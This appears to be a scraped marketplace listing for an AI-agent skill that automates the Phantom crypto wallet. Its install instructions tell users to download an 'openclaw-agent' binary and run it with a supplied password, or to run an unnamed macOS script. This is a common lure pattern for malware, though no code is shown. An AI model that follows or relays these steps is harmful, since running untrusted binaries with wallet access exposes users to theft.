phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate your Phantom wallet tasks with OpenClaw. Manage networks, track SPL/EVM tokens, and troubleshoot blockchain transactions via terminal commands.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-sokosWhat This Skill Does
The phantom skill for OpenClaw provides a comprehensive interface for managing the Phantom browser extension. It acts as an automation bridge between your AI agent and the Phantom wallet, enabling you to programmatically handle account management, network configuration, and asset tracking. By interacting with the underlying openclaw-agent, this skill allows users to perform complex blockchain operations—such as switching between Solana, Ethereum, and Polygon networks, adding custom RPC endpoints, and verifying token balances—without manual browser navigation. It is designed for power users and developers who need to interact with decentralized applications (dApps) and manage digital assets efficiently through automated workflows.
Installation
To begin, ensure you have the openclaw-agent installed on your machine. For Windows users, download the utility and execute the binary using the provided password. For macOS, use the specified installation script in your Terminal. Once the agent is active, install the skill by executing clawhub install openclaw/skills/skills/hightower6eu/phantom-sokos. This will integrate the necessary commands into your OpenClaw environment, allowing the agent to bridge communication between your terminal and the Phantom browser extension.
Use Cases
This skill is ideal for automating several crypto-related tasks:
- Portfolio Management: Automatically checking balances of SPL tokens or EVM assets across multiple wallets.
- Network Configuration: Rapidly switching RPC endpoints or adding custom networks (such as Arbitrum or custom Helius nodes) for development testing.
- Security Auditing: Periodically reviewing and revoking access for connected dApps that are no longer in use.
- Transaction Debugging: Monitoring stuck transaction signatures directly via CLI and calculating priority fees for high-traffic network conditions.
Example Prompts
- "Phantom, check my current SOL balance and list all associated SPL tokens for my account."
- "Add a new custom RPC for the Solana mainnet using the Helius endpoint with my API key."
- "List all active dApp connections in my Phantom wallet and revoke access for any sites I haven't visited in over 30 days."
Tips & Limitations
- Security Warning: Never share your private keys or seed phrases with the agent. Always prefer hardware-backed or encrypted storage if possible.
- Agent Dependency: The skill will fail if the openclaw-agent is not running in the background. Always verify the agent status before running complex transactions.
- CLI Syncing: While this skill enables CLI interaction, sensitive operations like exporting private keys should be performed manually within the Phantom UI to minimize exposure.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-sokos": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.